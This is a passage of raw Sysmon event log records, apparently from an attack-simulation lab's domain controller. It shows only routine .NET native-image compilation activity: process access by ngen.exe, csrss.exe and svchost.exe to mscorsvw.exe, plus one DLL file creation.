08:03:27.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21CF-5F25-0000-00104C040A00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6491,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:27.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21CF-5F25-0000-00104C040A00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:27.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21CF-5F25-0000-00104C040A00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6492,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:27.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21CF-5F25-0000-00104C040A00}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:27.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21CF-5F25-0000-00104C040A00}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6493,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:32.461\r\nProcessGuid: {41C8662E-21CF-5F25-0000-00104C040A00}\r\nProcessId: 3292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 08:03:32.461","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:32.461","ProcessGuid":"{41C8662E-21CF-5F25-0000-00104C040A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 08:03:32.461","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6494,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.570\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:32.570","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6495,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:32.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6496,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.586\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-001036090A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:32.586","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-001036090A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6497,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.742\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-00108E0C0A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:32.742","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-00108E0C0A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6498,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.742\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-00108E0C0A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:32.742","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-00108E0C0A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:32.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-00108E0C0A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 